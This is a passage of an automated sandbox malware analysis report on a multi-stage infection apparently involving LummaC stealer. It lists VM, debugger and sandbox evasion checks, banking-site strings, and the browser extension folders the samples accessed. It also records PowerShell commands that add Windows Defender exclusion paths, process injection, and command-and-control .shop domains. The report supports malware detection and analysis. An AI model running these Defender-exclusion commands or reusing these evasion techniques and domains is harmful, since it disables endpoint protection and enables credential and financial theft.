                                    Source: C:\Users\user\AppData\Local\Temp\1027562001\cbfb8a9c89.exeThread delayed: delay time: 96931
                                    Source: C:\Users\user\AppData\Local\Temp\1027562001\cbfb8a9c89.exeThread delayed: delay time: 96724
                                    Source: C:\Users\user\AppData\Local\Temp\1027562001\cbfb8a9c89.exeThread delayed: delay time: 598111
                                    Source: C:\Users\user\AppData\Local\Temp\1027562001\cbfb8a9c89.exeThread delayed: delay time: 597950
                                    Source: C:\Users\user\AppData\Local\Temp\1027562001\cbfb8a9c89.exeThread delayed: delay time: 597794
                                    Source: C:\Users\user\AppData\Local\Temp\1027562001\cbfb8a9c89.exeThread delayed: delay time: 597388
                                    Source: C:\Users\user\AppData\Local\Temp\1027562001\cbfb8a9c89.exeThread delayed: delay time: 596942
                                    Source: C:\Users\user\AppData\Local\Temp\1027562001\cbfb8a9c89.exeThread delayed: delay time: 922337203685477
                                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                    Source: C:\Users\user\AppData\Local\Temp\1027564001\696689ce6d.exeThread delayed: delay time: 30000
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                    Source: C:\Users\user\AppData\Local\Temp\DX0TGIT2LZWIIEDZ8Y3A15R.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\Jump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\DX0TGIT2LZWIIEDZ8Y3A15R.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\Jump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\DX0TGIT2LZWIIEDZ8Y3A15R.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\Jump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\DX0TGIT2LZWIIEDZ8Y3A15R.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\Jump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\DX0TGIT2LZWIIEDZ8Y3A15R.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\Jump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\DX0TGIT2LZWIIEDZ8Y3A15R.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\Jump to behavior
                                    Source: 696689ce6d.exe, 0000002F.00000003.4810210103.00000000034C0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.co.inVMware20,11696503903~
                                    Source: 696689ce6d.exe, 0000002F.00000003.4810210103.00000000034C0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696503903
                                    Source: 64252d274d.exe, 00000024.00000003.2465555446.00000000014AA000.00000004.00000020.00020000.00000000.sdmp, 64252d274d.exe, 00000024.00000002.2568911959.00000000014AD000.00000004.00000020.00020000.00000000.sdmp, 64252d274d.exe, 00000024.00000003.2390180371.00000000014AA000.00000004.00000020.00020000.00000000.sdmp, 64252d274d.exe, 00000024.00000003.2510983657.00000000014AA000.00000004.00000020.00020000.00000000.sdmp, 64252d274d.exe, 00000024.00000003.2315517363.00000000014AC000.00000004.00000020.00020000.00000000.sdmp, 64252d274d.exe, 00000024.00000003.2443015883.00000000014AC000.00000004.00000020.00020000.00000000.sdmp, 64252d274d.exe, 00000024.00000003.2511360727.00000000014AC000.00000004.00000020.00020000.00000000.sdmp, 64252d274d.exe, 00000024.00000003.2439674022.00000000014AA000.00000004.00000020.00020000.00000000.sdmp, 64252d274d.exe, 00000024.00000003.2466909262.00000000014AC000.00000004.00000020.00020000.00000000.sdmp, 64252d274d.exe, 00000024.00000003.2315191387.00000000014AA000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWw
                                    Source: 696689ce6d.exe, 0000002F.00000003.4810210103.00000000034C0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: tasks.office.comVMware20,11696503903o
                                    Source: 696689ce6d.exe, 0000002F.00000003.4810210103.00000000034C0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696503903z
                                    Source: 696689ce6d.exe, 0000002F.00000003.4810210103.00000000034C0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.comVMware20,11696503903}
                                    Source: 696689ce6d.exe, 0000002F.00000003.4810210103.00000000034C0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: trackpan.utiitsl.comVMware20,11696503903h
                                    Source: EdYEXasNiR.exe, 00000000.00000003.1742392652.00000000018C3000.00000004.00000020.00020000.00000000.sdmp, DX0TGIT2LZWIIEDZ8Y3A15R.exe, 00000003.00000002.2211683173.0000000000E44000.00000004.00000020.00020000.00000000.sdmp, DX0TGIT2LZWIIEDZ8Y3A15R.exe, 00000003.00000002.2211683173.0000000000E13000.00000004.00000020.00020000.00000000.sdmp, 64252d274d.exe, 00000024.00000003.2465555446.00000000014AA000.00000004.00000020.00020000.00000000.sdmp, 64252d274d.exe, 00000024.00000002.2568911959.00000000014AD000.00000004.00000020.00020000.00000000.sdmp, 64252d274d.exe, 00000024.00000003.2390180371.00000000014AA000.00000004.00000020.00020000.00000000.sdmp, 64252d274d.exe, 00000024.00000003.2510983657.00000000014AA000.00000004.00000020.00020000.00000000.sdmp, 64252d274d.exe, 00000024.00000003.2315517363.00000000014AC000.00000004.00000020.00020000.00000000.sdmp, 64252d274d.exe, 00000024.00000003.2443015883.00000000014AC000.00000004.00000020.00020000.00000000.sdmp, 64252d274d.exe, 00000024.00000003.2511360727.00000000014AC000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                                    Source: 696689ce6d.exe, 0000002F.00000003.4810210103.00000000034C0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - HKVMware20,11696503903]
                                    Source: cbfb8a9c89.exe, 0000001D.00000002.2534178874.0000000006A13000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: od_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
                                    Source: 696689ce6d.exe, 0000002F.00000003.4810210103.00000000034C0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: secure.bankofamerica.comVMware20,11696503903|UE
                                    Source: 696689ce6d.exe, 0000002F.00000003.4810210103.00000000034C0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696503903
                                    Source: jyidkjkfhjawd.exe, 00000041.00000002.2848173561.00000000008D3000.00000040.00000001.01000000.0000001D.sdmpBinary or memory string: &VBoxService.exe
                                    Source: jyidkjkfhjawd.exe, 00000041.00000003.2822393394.000000000075F000.00000004.00000020.00020000.00000000.sdmp, jyidkjkfhjawd.exe, 00000041.00000003.2807665436.0000000000761000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW^
                                    Source: 696689ce6d.exe, 0000002F.00000003.4810210103.00000000034C0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: turbotax.intuit.comVMware20,11696503903t
                                    Source: 696689ce6d.exe, 0000002F.00000003.4810210103.00000000034C0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696503903
                                    Source: 64252d274d.exe, 00000024.00000002.2565780538.0000000001480000.00000004.00000020.00020000.00000000.sdmp, 64252d274d.exe, 00000024.00000003.2535376296.000000000147C000.00000004.00000020.00020000.00000000.sdmp, 64252d274d.exe, 00000024.00000003.2536559655.000000000147F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWpCL
                                    Source: 696689ce6d.exe, 0000002F.00000003.4810210103.00000000034C0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU WestVMware20,11696503903n
                                    Source: 696689ce6d.exe, 0000002F.00000003.4810210103.00000000034C0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696503903p
                                    Source: 696689ce6d.exe, 0000002F.00000003.4810210103.00000000034C0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office.comVMware20,11696503903s
                                    Source: DX0TGIT2LZWIIEDZ8Y3A15R.exe, 00000003.00000002.2211683173.0000000000DCE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMwareVMware
                                    Source: DX0TGIT2LZWIIEDZ8Y3A15R.exe, 00000003.00000002.2221527701.000000000BB2D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\Device\CdRom0\??\Volume{a33c736e-61ca-11ee-8c18-806e6f6e6963}\DosDevices\D:
                                    Source: 696689ce6d.exe, 0000002F.00000003.4810210103.00000000034C0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.co.inVMware20,11696503903d
                                    Source: 696689ce6d.exe, 0000002F.00000003.4810210103.00000000034C0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: dev.azure.comVMware20,11696503903j
                                    Source: 696689ce6d.exe, 0000002F.00000003.4810210103.00000000034C0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: discord.comVMware20,11696503903f
                                    Source: 696689ce6d.exe, 0000002F.00000003.4810210103.00000000034C0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Test URL for global passwords blocklistVMware20,11696503903
                                    Source: cbfb8a9c89.exe, 0000001D.00000002.2457058091.00000000013C3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\@
                                    Source: 696689ce6d.exe, 0000002F.00000003.4810037160.00000000034CD000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: - GDCDYNVMware20,11696503903p
                                    Source: DX0TGIT2LZWIIEDZ8Y3A15R.exe, 00000003.00000002.2213540746.00000000012CF000.00000040.00000001.01000000.00000006.sdmp, 456YTTQ213T2RO9QAEYSNNZDL.exe, 456YTTQ213T2RO9QAEYSNNZDL.exe, 00000005.00000002.1875507715.0000000001065000.00000040.00000001.01000000.00000008.sdmp, skotes.exe, skotes.exe, 00000006.00000002.1915471288.0000000001145000.00000040.00000001.01000000.0000000A.sdmp, skotes.exe, 00000007.00000002.1918392273.0000000001145000.00000040.00000001.01000000.0000000A.sdmp, HJEHIJEBKE.exe, 0000001C.00000002.2273152610.00000000008B5000.00000040.00000001.01000000.00000010.sdmpBinary or memory string: HARDWARE\ACPI\DSDT\VBOX__
                                    Source: 696689ce6d.exe, 0000002F.00000003.4810210103.00000000034C0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696503903^
                                    Source: 696689ce6d.exe, 0000002F.00000003.4810210103.00000000034C0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: microsoft.visualstudio.comVMware20,11696503903x
                                    Source: 696689ce6d.exe, 0000002F.00000003.4810210103.00000000034C0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: bankofamerica.comVMware20,11696503903x
                                    Source: powershell.exe, 00000035.00000002.2755963896.0000017341AAE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\8b}
                                    Source: 696689ce6d.exe, 0000002F.00000003.4810210103.00000000034C0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: global block list test formVMware20,11696503903
                                    Source: 696689ce6d.exe, 0000002F.00000003.4810210103.00000000034C0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: ms.portal.azure.comVMware20,11696503903
                                    Source: 696689ce6d.exe, 0000002F.00000003.4810210103.00000000034C0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.comVMware20,11696503903
                                    Source: 696689ce6d.exe, 0000002F.00000003.4810210103.00000000034C0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: account.microsoft.com/profileVMware20,11696503903u
                                    Source: 696689ce6d.exe, 0000002F.00000003.4810210103.00000000034C0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: AMC password management pageVMware20,11696503903
                                    Source: 696689ce6d.exe, 0000002F.00000003.4810210103.00000000034C0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696503903}
                                    Source: cbfb8a9c89.exe, 0000001D.00000002.2457058091.00000000013C3000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000035.00000002.2532158082.000001732976D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                                    Source: jyidkjkfhjawd.exe, 00000041.00000003.2674898719.00000000007C2000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: +oVFPN3Z2aU6KODTyvg0BrXcq03UvyhQEmuc425K(
                                    Source: 696689ce6d.exe, 0000002F.00000003.4810037160.00000000034CD000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: NVMware2
                                    Source: 696689ce6d.exe, 0000002F.00000003.4810210103.00000000034C0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696503903x
                                    Source: jyidkjkfhjawd.exe, 00000041.00000002.2848173561.00000000008D3000.00000040.00000001.01000000.0000001D.sdmpBinary or memory string: VBoxService.exe
                                    Source: cbfb8a9c89.exe, 0000001D.00000002.2457058091.00000000013C3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                                    Source: EdYEXasNiR.exe, 00000000.00000003.1742392652.00000000018C3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWen-GBn[*q
                                    Source: 696689ce6d.exe, 0000002F.00000003.4810210103.00000000034C0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - COM.HKVMware20,11696503903
                                    Source: 696689ce6d.exe, 0000002F.00000003.4810210103.00000000034C0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office365.comVMware20,11696503903t
                                    Source: 696689ce6d.exe, 0000002F.00000003.4810210103.00000000034C0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: netportal.hdfcbank.comVMware20,11696503903
                                    Source: jyidkjkfhjawd.exe, 00000041.00000002.2848173561.00000000008D3000.00000040.00000001.01000000.0000001D.sdmpBinary or memory string: VMWare
                                    Source: 696689ce6d.exe, 0000002F.00000002.4900233255.000000000095C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWH
                                    Source: DX0TGIT2LZWIIEDZ8Y3A15R.exe, 00000003.00000002.2211683173.0000000000E44000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWJ
                                    Source: DX0TGIT2LZWIIEDZ8Y3A15R.exe, 00000003.00000002.2213540746.00000000012CF000.00000040.00000001.01000000.00000006.sdmp, 456YTTQ213T2RO9QAEYSNNZDL.exe, 00000005.00000002.1875507715.0000000001065000.00000040.00000001.01000000.00000008.sdmp, skotes.exe, 00000006.00000002.1915471288.0000000001145000.00000040.00000001.01000000.0000000A.sdmp, skotes.exe, 00000007.00000002.1918392273.0000000001145000.00000040.00000001.01000000.0000000A.sdmp, HJEHIJEBKE.exe, 0000001C.00000002.2273152610.00000000008B5000.00000040.00000001.01000000.00000010.sdmpBinary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
                                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeAPI call chain: ExitProcess graph end node
                                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeAPI call chain: ExitProcess graph end node
                                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeAPI call chain: ExitProcess graph end node
                                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeAPI call chain: ExitProcess graph end node
                                    Source: C:\Users\user\Desktop\EdYEXasNiR.exeSystem information queried: ModuleInformationJump to behavior
                                    Source: C:\Users\user\Desktop\EdYEXasNiR.exeProcess information queried: ProcessInformationJump to behavior

                                    Anti Debugging

                                    barindex
                                    Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation))
                                    Source: C:\Users\user\AppData\Local\Temp\1027564001\696689ce6d.exeSystem information queried: CodeIntegrityInformation
                                    Source: C:\Users\user\AppData\Local\Temp\1027564001\696689ce6d.exeSystem information queried: CodeIntegrityInformation
                                    Hides threads from debuggers
                                    Source: C:\Users\user\Desktop\EdYEXasNiR.exeThread information set: HideFromDebuggerJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\DX0TGIT2LZWIIEDZ8Y3A15R.exeThread information set: HideFromDebuggerJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\456YTTQ213T2RO9QAEYSNNZDL.exeThread information set: HideFromDebuggerJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeThread information set: HideFromDebuggerJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeThread information set: HideFromDebuggerJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeThread information set: HideFromDebugger
                                    Source: C:\Users\user\Documents\HJEHIJEBKE.exeThread information set: HideFromDebugger
                                    Source: C:\wOXcVegx\jyidkjkfhjawd.exeThread information set: HideFromDebugger
                                    Source: C:\wOXcVegx\jyidkjkfhjawd.exeThread information set: HideFromDebugger
                                    Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeThread information set: HideFromDebugger
                                    Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeThread information set: HideFromDebugger
                                    Tries to detect sandboxes and other dynamic analysis tools (window names)
                                    Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeOpen window title or class name: regmonclass
                                    Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeOpen window title or class name: gbdyllo
                                    Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeOpen window title or class name: process monitor - sysinternals: www.sysinternals.com
                                    Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeOpen window title or class name: procmon_window_class
                                    Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeOpen window title or class name: registry monitor - sysinternals: www.sysinternals.com
                                    Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeOpen window title or class name: ollydbg
                                    Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeOpen window title or class name: filemonclass
                                    Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeOpen window title or class name: file monitor - sysinternals: www.sysinternals.com
                                    Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeFile opened: NTICE
                                    Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeFile opened: SICE
                                    Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeFile opened: SIWVID
                                    Source: C:\Users\user\Desktop\EdYEXasNiR.exeProcess queried: DebugPortJump to behavior
                                    Source: C:\Users\user\Desktop\EdYEXasNiR.exeProcess queried: DebugPortJump to behavior
                                    Source: C:\Users\user\Desktop\EdYEXasNiR.exeProcess queried: DebugPortJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\DX0TGIT2LZWIIEDZ8Y3A15R.exeProcess queried: DebugPortJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\DX0TGIT2LZWIIEDZ8Y3A15R.exeProcess queried: DebugPortJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\DX0TGIT2LZWIIEDZ8Y3A15R.exeProcess queried: DebugPortJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\456YTTQ213T2RO9QAEYSNNZDL.exeProcess queried: DebugPortJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\456YTTQ213T2RO9QAEYSNNZDL.exeProcess queried: DebugPortJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\456YTTQ213T2RO9QAEYSNNZDL.exeProcess queried: DebugPortJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess queried: DebugPortJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess queried: DebugPortJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess queried: DebugPortJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess queried: DebugPortJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess queried: DebugPortJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess queried: DebugPortJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess queried: DebugPort
                                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess queried: DebugPort
                                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess queried: DebugPort
                                    Source: C:\Users\user\Documents\HJEHIJEBKE.exeProcess queried: DebugPort
                                    Source: C:\Users\user\Documents\HJEHIJEBKE.exeProcess queried: DebugPort
                                    Source: C:\Users\user\Documents\HJEHIJEBKE.exeProcess queried: DebugPort
                                    Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeProcess queried: DebugPort
                                    Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeProcess queried: DebugPort
                                    Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeProcess queried: DebugPort
                                    Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeProcess queried: DebugPort
                                    Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeProcess queried: DebugPort
                                    Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeProcess queried: DebugPort
                                    Source: C:\Users\user\AppData\Local\Temp\456YTTQ213T2RO9QAEYSNNZDL.exeCode function: 5_2_054C0CA7 rdtsc 5_2_054C0CA7
                                    Source: C:\Users\user\AppData\Local\Temp\DX0TGIT2LZWIIEDZ8Y3A15R.exeCode function: 3_2_6C53AC62 IsProcessorFeaturePresent,memset,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,3_2_6C53AC62
                                    Source: C:\Users\user\AppData\Local\Temp\456YTTQ213T2RO9QAEYSNNZDL.exeCode function: 5_2_00EA652B mov eax, dword ptr fs:[00000030h]5_2_00EA652B
                                    Source: C:\Users\user\AppData\Local\Temp\456YTTQ213T2RO9QAEYSNNZDL.exeCode function: 5_2_00EAA302 mov eax, dword ptr fs:[00000030h]5_2_00EAA302
                                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 6_2_00F8A302 mov eax, dword ptr fs:[00000030h]6_2_00F8A302
                                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 6_2_00F8652B mov eax, dword ptr fs:[00000030h]6_2_00F8652B
                                    Source: C:\Users\user\AppData\Local\Temp\1027562001\cbfb8a9c89.exeProcess token adjusted: Debug
                                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                                    Source: C:\Users\user\AppData\Local\Temp\DX0TGIT2LZWIIEDZ8Y3A15R.exeCode function: 3_2_6C53AC62 IsProcessorFeaturePresent,memset,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,3_2_6C53AC62
                                    Source: C:\Users\user\AppData\Local\Temp\DX0TGIT2LZWIIEDZ8Y3A15R.exeCode function: 3_2_6C53B12A SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,3_2_6C53B12A
                                    Source: C:\Users\user\AppData\Local\Temp\DX0TGIT2LZWIIEDZ8Y3A15R.exeMemory protected: page guardJump to behavior

                                    HIPS / PFW / Operating System Protection Evasion

                                    barindex
                                    Yara detected Powershell download and execute
                                    Source: Yara matchFile source: amsi64_6656.amsi.csv, type: OTHER
                                    Source: Yara matchFile source: amsi64_7380.amsi.csv, type: OTHER
                                    Source: Yara matchFile source: Process Memory Space: DX0TGIT2LZWIIEDZ8Y3A15R.exe PID: 2656, type: MEMORYSTR
                                    Source: Yara matchFile source: Process Memory Space: mshta.exe PID: 3388, type: MEMORYSTR
                                    Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 6656, type: MEMORYSTR
                                    Adds a directory exclusion to Windows Defender
                                    Source: C:\Users\user\AppData\Local\Temp\1027562001\cbfb8a9c89.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -NoProfile -Command Add-MpPreference -ExclusionPath 'C:\wOXcVegx'
                                    Source: C:\Users\user\AppData\Local\Temp\1027562001\cbfb8a9c89.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -NoProfile -Command Add-MpPreference -ExclusionPath 'C:\Users'
                                    Source: C:\Users\user\AppData\Local\Temp\1027562001\cbfb8a9c89.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -NoProfile -Command Add-MpPreference -ExclusionPath 'C:\wOXcVegx'
                                    Source: C:\Users\user\AppData\Local\Temp\1027562001\cbfb8a9c89.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -NoProfile -Command Add-MpPreference -ExclusionPath 'C:\Users'
                                    Injects a PE file into a foreign processes
                                    Source: C:\Users\user\AppData\Local\Temp\1027563001\64252d274d.exeMemory written: C:\Users\user\AppData\Local\Temp\1027563001\64252d274d.exe base: 400000 value starts with: 4D5A
                                    LummaC encrypted strings found
                                    Source: EdYEXasNiR.exe, 00000000.00000003.1549293280.0000000005480000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: cloudewahsj.shop
                                    Source: EdYEXasNiR.exe, 00000000.00000003.1549293280.0000000005480000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: rabidcowse.shop
                                    Source: EdYEXasNiR.exe, 00000000.00000003.1549293280.0000000005480000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: noisycuttej.shop
                                    Source: EdYEXasNiR.exe, 00000000.00000003.1549293280.0000000005480000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: tirepublicerj.shop
                                    Source: EdYEXasNiR.exe, 00000000.00000003.1549293280.0000000005480000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: framekgirus.shop
                                    Source: EdYEXasNiR.exe, 00000000.00000003.1549293280.0000000005480000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: wholersorie.shop
